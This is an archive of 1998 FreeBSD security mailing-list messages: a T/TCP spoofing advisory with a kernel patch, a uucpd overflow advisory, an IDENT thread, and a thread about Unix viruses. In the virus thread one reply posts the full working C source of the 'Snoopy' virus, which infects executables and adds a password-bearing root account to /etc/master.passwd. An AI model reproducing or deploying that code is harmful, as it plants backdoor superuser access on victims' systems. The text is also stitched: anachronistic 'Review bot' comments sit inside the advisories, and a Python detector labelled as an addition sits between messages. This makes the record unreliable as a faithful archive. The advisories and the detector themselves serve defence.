From owner-freebsd-security Sun May 17 12:56:53 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07696 for freebsd-security-outgoing; Sun, 17 May 1998 12:56:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gvr.gvr.org (guido@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07573 for ; Sun, 17 May 1998 12:56:22 -0700 (PDT) (envelope-from guido@gvr.org)
Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id VAA03357; Sun, 17 May 1998 21:55:19 +0200 (MET DST)
From: Guido van Rooij
Message-Id: <199805171955.VAA03357@gvr.gvr.org>
Subject: Re: Why aren't security fixes posted to security-announce?
In-Reply-To: from Snob Art Genre at "May 14, 98 05:47:43 pm"
To: ben@rosengart.com
Date: Sun, 17 May 1998 21:55:19 +0200 (MET DST)
Cc: avalon@coombs.anu.edu.au, fpscha@schapachnik.com.ar, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Snob Art Genre wrote:
> On Thu, 14 May 1998, Guido van Rooij wrote:
>
> > Will arrive soon. I was just busy with the ttcp advisory.
>
> Speaking of which, what does your patch do?

It makes sure that only those programs that explicitly set the TCP_NOPUSH option (and are thus ttcp aware) will be able to get ttcp connections. The r-* services do not set this option and thus accelerated opens are not allowed to the ports they listen() on.

-Guido

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message

From: Guido van Rooij
Message-Id: <199805172001.WAA03452@gvr.gvr.org>
Subject: Re: Why aren't security fixes posted to security-announce?
In-Reply-To: <199805151330.NAA30305@paranoid.eltex.spb.ru> from "ark@eltex.spb.ru" at "May 15, 98 01:30:19 pm"
To: ark@eltex.spb.ru
Date: Sun, 17 May 1998 22:01:42 +0200 (MET DST)
Cc: avalon@coombs.anu.edu.au, eltex.spb.ru@gvr.gvr.org, fpscha@schapachnik.com.ar, freebsd-security@FreeBSD.ORG

>
> btw i've noticed that patches for 2.1 branch aren't posted anymore.
> It is not hard (usually) to apply patches from 2.2 to 2.1 but sometimes
> (i'd even say often) it has to be done manually.
>
> I am fully satisfied with 2.1.7.1 system and i do not want to upgrade.

I will make a 2.1 patch and post an advisory update next monday.

-Guido

Message-ID: <01BD824B.7FB9C100@w3svcs.mfn.org>
From: "J.A. Terranson"
To: "'FreeBSD Security'", "'FreeBSD Questions'"
Subject: hub.freebsd.org IDENT requests
Date: Mon, 18 May 1998 10:55:38 -0500

* Cross posted to freebsd-security *

hub.freebsd.org (and *only* hub.freebsd.org!) attempts an IDENT sequence when talking to our mailservers - the port 113 kind. These are *always* rejected (but the mail still gets accepted [obviously]).

Why does your machine do this, i.e., what protocol is it trying to exec? AFAIK, SMTP does not support 113 authentication (plz correct me if I am mistaken)

Very Truly Yours,

J.A. Terranson
sysadmin@mfn.org

Message-ID: <19980518202948.A15917@ucb.crimea.ua>
Date: Mon, 18 May 1998 20:29:48 +0300
From: Ruslan Ermilov
To: "'FreeBSD Security'", "'FreeBSD Questions'"
Subject: Re: hub.freebsd.org IDENT requests
References: <01BD824B.7FB9C100@w3svcs.mfn.org>
In-Reply-To: <01BD824B.7FB9C100@w3svcs.mfn.org>; from J.A. Terranson on Mon, May 18, 1998 at 10:55:38AM -0500
X-Operating-System: FreeBSD 2.2.6-STABLE i386

On Mon, May 18, 1998 at 10:55:38AM -0500, J.A. Terranson wrote:
> * Cross posted to freebsd-security *
>
> hub.freebsd.org (and *only* hub.freebsd.org!) attempts an IDENT
> sequence when talking to our mailservers - the port 113 kind. These
> are *always* rejected (but the mail still gets accepted [obviously]).
>
> Why does your machine do this, i.e., what protocol is it trying
> to exec? AFAIK, SMTP does not support 113 authentication (plz correct
> me if I am mistaken)

SMTP does not, but sendmail does ;-)

--
Ruslan Ermilov                 System Administrator
ru@ucb.crimea.ua               United Commercial Bank
+380-652-247647                Simferopol, Crimea
2426679 ICQ Network, UIN

Date: Mon, 18 May 1998 19:40:41 +0200 (MET DST)
Message-Id: <199805181740.TAA07658@gvr.gvr.org>
From: FreeBSD Security Officer
To: undisclosed-recipients:;
Subject: FreeBSD Security Advisory: FreeBSD-SA-98:03.ttcp REVISED
Reply-To: security-officer@FreeBSD.ORG

WARNING: The patch given in the original advisory had an error. You should apply the patch in this advisory. In order to do so, you should have the original file. If you no longer have the original, look at

    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:03/ttcp.orig

It contains the original patch. You should then apply it first using patch with the -R option. We're sorry for any inconvenience this may cause.

This advisory also contains a valid patch for FreeBSD 2.1.* versions.

=============================================================================
FreeBSD-SA-98:03                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          Problems with TTCP

Category:       core
Module:         kernel
Announced:      1998-05-14, revised at 1998-05-18
Affects:        FreeBSD 2.1.*
                FreeBSD 2.2.*, FreeBSD-2.2-stable before 1998/05/14 and
                FreeBSD-3.0-current before 1998/05/05 suffer from this problem.
Corrected:      FreeBSD-3.0-current as of 1998/05/14
                FreeBSD-2.2-stable as of 1998/05/05
                FreeBSD-2.1-stable as of 1998/05/18
FreeBSD only:   No. Any other system incorporating TTCP extensions may be affected.

Patches:        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:03/

I.   Background

RFC 1644 provides an extension to TCP called TCP Extensions for Transactions, or shortly T/TCP. It provides a way of bypassing the standard three-way handshake found in TCP, thus speeding up transactions. T/TCP has been incorporated in FreeBSD since FreeBSD 2.0.5.

II.  Problem Description

An accelerated open is initiated by a client by sending a new TCP option, called CC, to the server. The kernel keeps a special cache for each host it communicated with, among others containing the value of the last CC option used by the client. A new accelerated open is allowed when the CC sent is larger than the one in the per-host cache. Thus one can spoof complete connections.

III. Impact

The hole can be used to obtain unauthorized access to the system by spoofing connections to the r*-services. This can only be done in the case where an .rhosts file and/or a hosts.equiv file is used as the sole method of authentication.

IV.  Workaround

Disable all r-* services. Note that setting the kernel variable net.inet.tcp.rfc1644 to 0 does not solve the problem. This variable controls whether the system will initiate rfc1644 based connections and does not affect the ability to receive such connections.

V.   Solution

Apply the following patch, rebuild your kernel, install it and reboot your system. The patch is valid for 2.1.* systems, for 2.1-stable, for 2.2.* systems, for 2.2-stable and for 3.0-current.

The patch below can be found on ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:03/

Index: tcp_input.c
===================================================================
RCS file: /home/ncvs/src/sys/netinet/tcp_input.c,v
retrieving revision 1.74
retrieving revision 1.77
diff -u -r1.74 -r1.77
--- tcp_input.c 1998/04/24 10:08:57     1.74
+++ tcp_input.c 1998/05/18 17:11:24     1.77
@@ -680,7 +680,9 @@
          *   - otherwise do a normal 3-way handshake.
          */
         if ((to.to_flag & TOF_CC) != 0) {
-            if (taop->tao_cc != 0 && CC_GT(to.to_cc, taop->tao_cc)) {
+            if (((tp->t_flags & TF_NOPUSH) != 0) &&
+                taop->tao_cc != 0 && CC_GT(to.to_cc, taop->tao_cc)) {
+                taop->tao_cc = to.to_cc;
                 tp->t_state = TCPS_ESTABLISHED;

=============================================================================
FreeBSD, Inc.

Web Site:                       http://www.freebsd.org/
Confidential contacts:          security-officer@freebsd.org
Security notifications:         security-notifications@freebsd.org
Security public discussion:     freebsd-security@freebsd.org
PGP Key:                        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc

Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary.
=========================================================================
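Review bot: in the `if (((tp->t_flags & TF_NOPUSH) != 0) && ...` condition, the hunk's trailing context stops at `tp->t_state = TCPS_ESTABLISHED;`, so the branch taken when the listener lacks TF_NOPUSH (the normal 3-way handshake the comment above promises) is not shown, and it is not visible whether that path still refreshes `taop->tao_cc` or whether the new `taop->tao_cc = to.to_cc;` inside the gate is now the only place the per-host CC cache is updated on a passive open; confirm this against the surrounding code, since a stale cache affects every later accelerated open from that host. The comment block ending `- otherwise do a normal 3-way handshake.` should also gain a line stating that an accelerated open additionally requires the listening socket to have set TCP_NOPUSH (the TF_NOPUSH flag), as the revised condition is otherwise undocumented at the point of use.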

Message-ID: <19980518151339.E3376@puck.nether.net>
Date: Mon, 18 May 1998 15:13:39 -0400
From: Jared Mauch
To: "J.A. Terranson"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: hub.freebsd.org IDENT requests
References: <01BD824B.7FB9C100@w3svcs.mfn.org>
In-Reply-To: <01BD824B.7FB9C100@w3svcs.mfn.org>; from J.A. Terranson on Mon, May 18, 1998 at 10:55:38AM -0500

My favorite is this:

May 18 01:47:59 puck sendmail[26336]: NOQUEUE: Null connection from hub.FreeBSD.ORG [204.216.27.18]
May 18 09:02:21 puck sendmail[31482]: NOQUEUE: Null connection from hub.FreeBSD.ORG [204.216.27.18]

I get these periodically. The only way you get these is if someone connects to your smtp port and then does a "QUIT" without doing anything else.

- Jared

On Mon, May 18, 1998 at 10:55:38AM -0500, J.A. Terranson wrote:
> * Cross posted to freebsd-security *
>
> hub.freebsd.org (and *only* hub.freebsd.org!) attempts an IDENT
> sequence when talking to our mailservers - the port 113 kind. These
> are *always* rejected (but the mail still gets accepted [obviously]).
>
> Why does your machine do this, i.e., what protocol is it trying
> to exec? AFAIK, SMTP does not support 113 authentication (plz correct
> me if I am mistaken)
>
>
> Very Truly Yours,
>
> J.A. Terranson
> sysadmin@mfn.org

--
Work: jared@qual.net - We Make The Internet Work for Your Business
9-5pm(ET) 800 637 4424x2634 - 24x7 NOC - 800 424 3223
pgp key available via finger from jared@puck.nether.net

Date: Tue, 19 May 1998 02:31:27 -0700 (MST)
From: RSI Advise
To: Advise Account
Subject: RSI.0002.05-18-98.BNU.UUCPD

RSI.0002.05-18-98.BNU.UUCPD

Repent Security Incorporated, RSI
[ http://www.repsec.com ]

*** RSI ALERT ADVISORY ***

--- [CREDIT] --------------------------------------------------------------

Vulnerability found by:  Matt Conover
Notes:                   This advisory has been brought to you by WSD; RSI's official research & development team.
Webpage:                 http://www.w00w00.org
Authors:                 Matt Conover & Mark Zielinski

--- [SUMMARY] -------------------------------------------------------------

Announced:       April 21, 1998
Report code:     RSI.0002.05-18-98.BNU.UUCPD
Report title:    BNU uucpd
Vulnerability:   Insufficient bounds checking
Vendor status:   NetBSD:  Contacted, patch information below
                 OpenBSD: Contacted, patch information below
                 Solaris: Contacted, awaiting patch information
Patch status:    Patch available for certain Operating Systems at the end of this advisory
Platforms:       OSF 1.0, 2.0, SunOS 4.1.3, 4.1.4
                 Solaris 2.2, 2.3, 2.4, 2.5.1
                 NetBSD 1.3, 1.3.1
                 OpenBSD 2.1, 2.2
Not affected:    FreeBSD 2.x
                 BSDi 2.x, 3.x
                 RedHat Linux 4.x, 5.x
                 Slackware Linux 3.x
Reference:       http://www.repsec.com/advisories.html
Impact:          If exploited, an attacker could locally compromise root on your system.

--- [DETAILS] -------------------------------------------------------------

Problem:

Upon successfully logging into a system with uucpd, the daemon will attempt to record wtmp information. However, due to insufficient bounds checking, a buffer overflow can result when uucpd attempts to copy the connecting hostname into a buffer with a predefined size. While overwriting the buffer, the attacker can manipulate the stack and execute their own commands, possibly gaining root access into the system. The attacker must have an account on the system, which will allow this to be exploited.

This problem is present in BNU uucpd. This is not installed by default on every operating system. This also may not always run as root.

Known vulnerable Operating Systems include:

    OSF 1.0, 2.0, SunOS 4.1.3, 4.1.4
    Solaris 2.2, 2.3, 2.4, 2.5.1
    NetBSD 1.3, 1.3.1
    OpenBSD 2.1, 2.2

Operating Systems not vulnerable:

    FreeBSD 2.x
    BSDi 2.x, 3.x
    RedHat Linux 4.x, 5.x
    Slackware Linux 3.x

For more information on this type of attack, point your web browsers to http://www.repsec.com/bofs.html.

--- [FIX] -----------------------------------------------------------------

Solution: A generic patch has been made publicly available by the RSI staff.

--- [PATCH] ---------------------------------------------------------------

Solution: Apply the following patch to uucpd.c:

--- uucpd.old.c Thu Feb  6 06:34:45 1997
+++ uucpd.c     Tue Apr  7 16:37:46 1998
@@ -300,7 +300,8 @@
        time(&ll.ll_time);
        lseek(f, pw->pw_uid * sizeof(struct lastlog), 0);
-       strcpy(line, remotehost);
+       strncpy(line, remotehost, sizeof(line)-1);
        SCPYN(ll.ll_line, line);
        SCPYN(ll.ll_host, remotehost);
        (void) write(f, (char *) &ll, sizeof ll);

For NetBSD's patch please refer to: http://www.repsec.com/advisory/0002.patch.html

---------------------------------------------------------------------------
Repent Security Incorporated (RSI)          advise@repsec.com
13610 N. Scottsdale Rd. Suite #10-326       [ http://www.repsec.com ]
Scottsdale, AZ 85254
---------------------------------------------------------------------------

Copyright May 1998 RepSec, Inc.

The information in this document is provided as a service to customers of RepSec, Inc. Neither RepSec, Inc., nor any of its employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or services by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by RepSec, Inc. The views and opinions of authors expressed herein do not necessarily state or reflect those of RepSec, Inc., and may not be used for advertising or product endorsement purposes.
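Review bot: `strncpy(line, remotehost, sizeof(line)-1)` bounds the write but does not guarantee termination: strncpy only NUL-pads when the source is shorter than the count, so for a remotehost of sizeof(line)-1 bytes or longer, line[sizeof(line)-1] keeps whatever it held before and the following `SCPYN(ll.ll_line, line);` reads past the copied bytes unless line was zeroed beforehand. Add `line[sizeof(line)-1] = '\0';` directly after the strncpy. The hunk also leaves `SCPYN(ll.ll_host, remotehost);` copying the unbounded hostname straight into the lastlog record; whether that is safe depends on SCPYN limiting the copy to the destination size, which is not visible in these lines and should be checked before the patch is accepted as complete.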
The material in this alert advisory may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to RepSec, Inc.

This alert advisory may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community.

---------------------------------------------------------------------------
RepSec, Inc. are trademarks of RepSec, Inc. All other trademarks are property of their respective holders.

Message-ID: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com>
Date: Wed, 20 May 1998 09:48:11 -0700
From: Emmanuel Gravel
Organization: Honeywell
To: freebsd-security@FreeBSD.ORG
Subject: Virus on FreeBSD

I haven't heard of a virus made for a Unix-like OS before, but I'm wondering if this can be an issue with FreeBSD (or Linux for that matter). I'm saying this since they both run on the most common platform there is today, the PC. I know most virii were written for DOS-like OS's, but it's my impression that the common point between both machines is the hardware.

Can anyone either clear this for me, or point me in the right direction for some info?

Thanks!

Emmanuel Gravel
egravel@elr346.ateng.az.honeywell.com

From: ark@eltex.spb.ru
Date: Wed, 20 May 1998 22:19:44 GMT
Message-Id: <199805202219.WAA09218@paranoid.eltex.spb.ru>
In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> from "Emmanuel Gravel"
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Virus on FreeBSD
To: egravel@elr346.ateng.az.honeywell.com
Cc: freebsd-security@FreeBSD.ORG

nuqneH,

Emmanuel Gravel said :
> I haven't heard of a virus made for a Unix-like OS before, but I'm
> wondering if this can be an issue with FreeBSD (or Linux for that
> matter). I'm saying this since they both run on the most common
> platform there is today, the PC. I know most virii were written for
> DOS-like OS's, but it's my impression that the common point between
> both machines is the hardware.
>
> Can anyone either clear this for me, or point me in the right direction
> for some info?
>
> Thanks!

---
/* The Snoopy Virus for BSD Free Unix 2.0.2 (and others) */
/* (C) 1995 American Eagle Publications, Inc. All rights reserved! */
/* Compile with Gnu C, "gcc snoopy.c" */

#include
#include
#include
#include

DIR *dirp;                    /* directory search structure */
struct dirent *dp;            /* directory entry record */
struct stat st;               /* file status record */
int stst;                     /* status call status */
FILE *host,*virus, *pwf;      /* host and virus files. */
long FileID;                  /* 1st 4 bytes of host */
char buf[512];                /* buffer for disk reads/writes */
char *lc,*ld;                 /* used to search for X23 */
size_t amt_read,hst_size;     /* amount read from file, host size */
size_t vir_size=13264;        /* size of X23, in bytes */
char dirname[10];             /* subdir where X23 stores itself */
char hst[512];

/* snoopy super user entry for the password file, pw='A Snoopy Dog.' */
char snoopy[]="snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:";

void readline()
{
  lc=&buf[1];
  buf[0]=0;
  while (*(lc-1)!=10) {
    fread(lc,1,1,pwf);
    lc++;
  }
}

void writeline()
{
  lc=&buf[1];
  while (*(lc-1)!=10) {
    fwrite(lc,1,1,host);
    lc++;
  }
}

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];
{
  strcpy((char *)&dirname,"./\005");                 /* set up host directory name */
  dirp=opendir(".");                                 /* begin directory search */
  while ((dp=readdir(dirp))!=NULL) {                 /* have a file, check it out */
    if ((stst=stat((const char *)&dp->d_name,&st))==0) {   /* get status */
      lc=(char *)&dp->d_name;
      while (*lc!=0) lc++;
      lc=lc-3;                                       /* lc points to last 3 chars in file name */
      if ((!((*lc=='X')&&(*(lc+1)=='2')&&(*(lc+2)=='3')))  /* "X23"? */
          &&(st.st_mode&S_IXUSR!=0)) {               /* and executable? */
        strcpy((char *)&buf,(char *)&dirname);
        strcat((char *)&buf,"/");
        strcat((char *)&buf,(char *)&dp->d_name);    /* see if X23 file */
        strcat((char *)&buf,".X23");                 /* exists already */
        if ((host=fopen((char *)&buf,"r"))!=NULL) fclose(host);
        else {                                       /* no it doesn't - infect! */
          host=fopen((char *)&dp->d_name,"r");
          fseek(host,0L,SEEK_END);                   /* determine host size */
          hst_size=ftell(host);
          fclose(host);
          if (hst_size>=vir_size) {                  /* host must be larger than virus */
            mkdir((char *)&dirname,S_IRWXU|S_IRWXG|S_IRWXO);
            rename((char *)&dp->d_name,(char *)&buf);    /* rename host */
            if ((virus=fopen(argv[0],"r"))!=NULL) {
              if ((host=fopen((char *)&dp->d_name,"w"))!=NULL) {
                while (!feof(virus)) {               /* and copy virus to orig */
                  amt_read=512;                      /* host name */
                  amt_read=fread(&buf,1,amt_read,virus);
                  fwrite(&buf,1,amt_read,host);
                  hst_size=hst_size-amt_read;
                }
                fwrite(&buf,1,hst_size,host);
                fclose(host);
                chmod((char *)&dp->d_name,S_IRWXU|S_IRWXG|S_IRWXO);
                strcpy((char *)&buf,(char *)&dirname);
                strcpy((char *)&buf,"/");
                strcat((char *)&buf,(char *)&dp->d_name);
                chmod((char *)&buf,S_IRWXU|S_IRWXG|S_IRWXO);
              }
              else rename((char *)&buf,(char *)&dp->d_name);
              fclose(virus);                         /* infection process complete */
            }                                        /* for this file */
            else rename((char *)&buf,(char *)&dp->d_name);
          }
        }
      }
    }
  }
  (void)closedir(dirp);                              /* infection process complete for this dir */

  /* now see if we can get at the password file */
  if ((pwf=fopen("/etc/master.passwd","r+"))!=NULL) {
    host=fopen("/etc/mast.pw","w");                  /* temporary file */
    stst=0;
    while (!feof(pwf)) {
      readline();                                    /* scan the file for user "snoopy" */
      lc=&buf[1];
      if ((*lc=='s')&&(*(lc+1)=='n')&&(*(lc+2)=='o')&&(*(lc+3)=='o')&&
          (*(lc+4)=='p')&&(*(lc+5)=='y')) stst=1;
      writeline();
    }
    if (stst==0) {                                   /* if no "snoopy" found */
      strcpy((char *)&buf[1],(char *)&snoopy);       /* add it! */
      lc=&buf[1];
      while (*lc!=0) lc++;
      *lc=10;
      writeline();
    }
    fclose(host);
    fclose(pwf);
    rename("/etc/mast.pw","/etc/master.passwd");     /* update master.passwd */
  }
  strcpy((char *)&buf,argv[0]);                      /* the host is this program's name */
  lc=(char *)&buf;                                   /* find end of directory path */
  while (*lc!=0) lc++;
  while (*lc!='/') lc--;
  *lc=0;
  lc++;
  strcpy((char *)&hst,(char *)&buf);
  ld=(char *)&dirname+1;                             /* insert the ^E directory */
  strcat((char *)&hst,(char *)ld);                   /* and put file name on the end */
  strcat((char *)&hst,"/");
  strcat((char *)&hst,(char *)lc);
  strcat((char *)&hst,".X23");                       /* with an X23 tacked on */
  execve((char *)&hst,argv,envp);                    /* execute this program's host */
}
---

CU in Hell                    /Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

Date: Wed, 20 May 1998 14:51:12 -0400 (EDT)
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: Emmanuel Gravel
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com>

It is possible to have viruses on Unix-like platforms, but their activities are constrained by the multiuser features of the OS. DOS/Win* viruses will not work on FreeBSD or Linux.

On Wed, 20 May 1998, Emmanuel Gravel wrote:
> I haven't heard of a virus made for a Unix-like OS before, but I'm
> wondering if this can be an issue with FreeBSD (or Linux for that
> matter). I'm saying this since they both run on the most common
> platform there is today, the PC. I know most virii were written for
> DOS-like OS's, but it's my impression that the common point between
> both machines is the hardware.
>
> Can anyone either clear this for me, or point me in the right direction
> for some info?
>
> Thanks!
>
> Emmanuel Gravel
> egravel@elr346.ateng.az.honeywell.com

Ben

"You have your mind on computers, it seems."
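A defensive counterpart to the Snoopy source quoted two messages up, added here as an example and not part of this thread: it parses a master.passwd image and flags UID-0 accounts outside an allow-list (the extra "snoopy" superuser the virus appends), and it scans a directory tree for the virus's on-disk traces, a subdirectory named with a control character and the displaced `.X23` copies of infected executables. The password records and the scratch directory tree are constructed; the allow-list of `root` and `toor` is an assumption about a stock FreeBSD install.

```python
"""Host checks for the two traces the Snoopy source leaves behind.

Added example, not code from the thread.  All sample data is constructed.
"""
import os
import shutil
import tempfile
from typing import Iterable, List, Tuple

# Assumption: a stock FreeBSD master.passwd has exactly these UID-0 accounts.
DEFAULT_UID0 = frozenset({"root", "toor"})


def parse_master_passwd(lines: Iterable[str]) -> List[Tuple[str, int]]:
    """Return (name, uid) for every well-formed master.passwd record.

    Ten colon-separated fields: name:passwd:uid:gid:class:change:expire:
    gecos:home:shell.  Comments, blank lines and malformed records are
    skipped rather than trusted; the file may have been written by the
    attacker we are looking for.
    """
    entries = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 10:
            continue
        try:
            uid = int(fields[2])
        except ValueError:
            continue
        entries.append((fields[0], uid))
    return entries


def unexpected_uid0(lines: Iterable[str], allowed=DEFAULT_UID0) -> List[str]:
    """Sorted names of UID-0 accounts that are not on the allow-list."""
    return sorted(name for name, uid in parse_master_passwd(lines)
                  if uid == 0 and name not in allowed)


def has_control_char(name: str) -> bool:
    """Snoopy's data directory is literally named "\\005" (Ctrl-E)."""
    return any(ord(ch) < 0x20 or ch == "\x7f" for ch in name)


def snoopy_artifacts(root: str) -> List[str]:
    """Sorted paths of control-character names and *.X23 files under root.

    The virus moves each infected executable into the "\\005" directory,
    appends ".X23" to its name and puts a copy of itself in the original
    place; either trace is abnormal on a clean system.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if has_control_char(d):
                hits.append(os.path.join(dirpath, d))
        for f in filenames:
            if f.endswith(".X23") or has_control_char(f):
                hits.append(os.path.join(dirpath, f))
    return sorted(hits)


# Constructed master.passwd sample.  The 'snoopy' record is the one the
# virus source appends; 'toor' is FreeBSD's alternate UID-0 account.
SAMPLE_MASTER_PASSWD = [
    "# constructed sample, not a real system file",
    "root:*:0:0::0:0:Charlie &:/root:/bin/csh",
    "toor:*:0:0::0:0:Bourne-again Superuser:/root:",
    "daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin",
    "snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:",
    "ben:*:1001:1001::0:0:Ben:/home/ben:/bin/sh",
    "broken:*:notanumber:0::0:0:malformed record:/:/bin/sh",
]


def demo_scan() -> List[str]:
    """Plant the constructed traces in a scratch tree, scan it, clean up.

    Returns hits relative to the scratch root so the result is stable.
    """
    base = tempfile.mkdtemp(prefix="snoopy-check-")
    try:
        hidden = os.path.join(base, "\x05")                # the "./\005" dir
        os.mkdir(hidden)
        open(os.path.join(hidden, "ls.X23"), "w").close()  # displaced host
        open(os.path.join(base, "ls"), "w").close()        # clean decoy
        return [os.path.relpath(p, base) for p in snoopy_artifacts(base)]
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print("unexpected UID-0 accounts:", unexpected_uid0(SAMPLE_MASTER_PASSWD))
    print("constructed-tree hits:", demo_scan())
```

On a live system, feed `unexpected_uid0` the lines of /etc/master.passwd and point `snoopy_artifacts` at the directories on PATH; any hit is a starting point for an integrity check, not a verdict on its own.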

In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com>
Date: Wed, 20 May 1998 15:21:35 -0400 (EDT)
Reply-To: Stunt Pope
Organization: Private World Communications
From: Stunt Pope
To: Emmanuel Gravel
Subject: RE: Virus on FreeBSD
Cc: freebsd-security@FreeBSD.ORG

On 20-May-98 Emmanuel Gravel wrote:
> I haven't heard of a virus made for a Unix-like OS before, but I'm
> wondering if this can be an issue with FreeBSD (or Linux for that
> matter). I'm saying this since they both run on the most common
> platform there is today, the PC. I know most virii were written for
> DOS-like OS's, but it's my impression that the common point between
> both machines is the hardware.
>
> Can anyone either clear this for me, or point me in the right direction
> for some info?
>

Check out the Bugtraq archives, and search on "linux virus", there was one released last summer or so, mainly as an exercise IIRC. Can't remember the name of it though.

(http://www.geek-girl.com/bugtraq/)

-mark

---
Mark Jeftovic                 aka: mark jeff or vic, stunt pope.
markjr@shmOOze.net            http://www.shmOOze.net/~markjr
Private World's BOFH          http://www.PrivateWorld.com
irc: L-bOMb                   Keep `em Guessing

Message-ID: <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com>
Date: Wed, 20 May 1998 13:17:11 -0700
From: Emmanuel Gravel
Organization: Honeywell
X-Mailer: Mozilla 3.03Gold (X11; I; OpenVMS V6.1 VAXstation 4000-90)
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Stunt Pope wrote:
> On 20-May-98 Emmanuel Gravel wrote:
> > I haven't heard of a virus made for a Unix-like OS before, but I'm
> > wondering if this can be an issue with FreeBSD (or Linux for that
> > matter). I'm saying this since they both run on the most common
> > platform there is today, the PC. I know most virii were written for
> > DOS-like OS's, but it's my impression that the common point between
> > both machines is the hardware.
> >
> > Can anyone either clear this for me, or point me in the right direction
> > for some info?
> >
>
> Check out the Bugtraq archives and search on "linux virus"; there was
> one released last summer or so, mainly as an exercise IIRC. Can't
> remember the name of it though.
>
> (http://www.geek-girl.com/bugtraq/)
>
> -mark

Thanks for all the info. Now for a second question. Since there is an antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two more Unix OS's), is there anything similar made for FreeBSD? What can one download/purchase to prevent:

1- Arrival/infection of the system from any virus that would target FreeBSD?
2- Presence of virii for any other OS in any file on the system?

Thanks for your help!

Emmanuel Gravel
egravel@elr346.ateng.az.honeywell.com

From owner-freebsd-security Wed May 20 15:26:18 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA11776 for freebsd-security-outgoing; Wed, 20 May 1998 15:26:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from coleridge.kublai.com (coleridge.kublai.com [207.96.1.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA11704 for ; Wed, 20 May 1998 15:25:51 -0700 (PDT) (envelope-from shmit@natasya.kublai.com)
Received: from natasya.kublai.com (natasya.kublai.com [207.172.25.236]) by coleridge.kublai.com (8.8.8/8.8.8) with ESMTP id SAA03153; Wed, 20 May 1998 18:25:33 -0400 (EDT) (envelope-from shmit@natasya.kublai.com)
Received: (from shmit@localhost) by natasya.kublai.com (8.8.8/8.8.8) id SAA19246; Wed, 20 May 1998 18:25:32 -0400 (EDT)
Message-ID: <19980520182532.04857@kublai.com>
Date: Wed, 20 May 1998 18:25:32 -0400
From: Brian Cully
To: Emmanuel Gravel , freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
Reply-To: shmit@kublai.com
Mail-Followup-To: Emmanuel Gravel , freebsd-security@FreeBSD.ORG
References: <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.89i
In-Reply-To: <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com>; from Emmanuel Gravel on Wed, May 20, 1998 at 01:17:11PM -0700
X-Sender: If your mailer pays attention to this, it's broken.
X-PGP-Info: finger shmit@kublai.com for my public key.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Wed, May 20, 1998 at 01:17:11PM -0700, Emmanuel Gravel wrote:
> Thanks for all the info. Now for a second question. Since there is an
> antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two
> more Unix OS's) is there anything similar made for FreeBSD? What can
> one download/purchase to prevent:
>
> 1- Arrival/infection of the system from any virus that would target
> FreeBSD?

Don't run anything as root and it has a fairly limited chance of spreading to anything. :-)

> 2- Presence of virii for any other OS in any file on the system?

Use McAfee's tools for various other Operating Systems.

--
Brian Cully
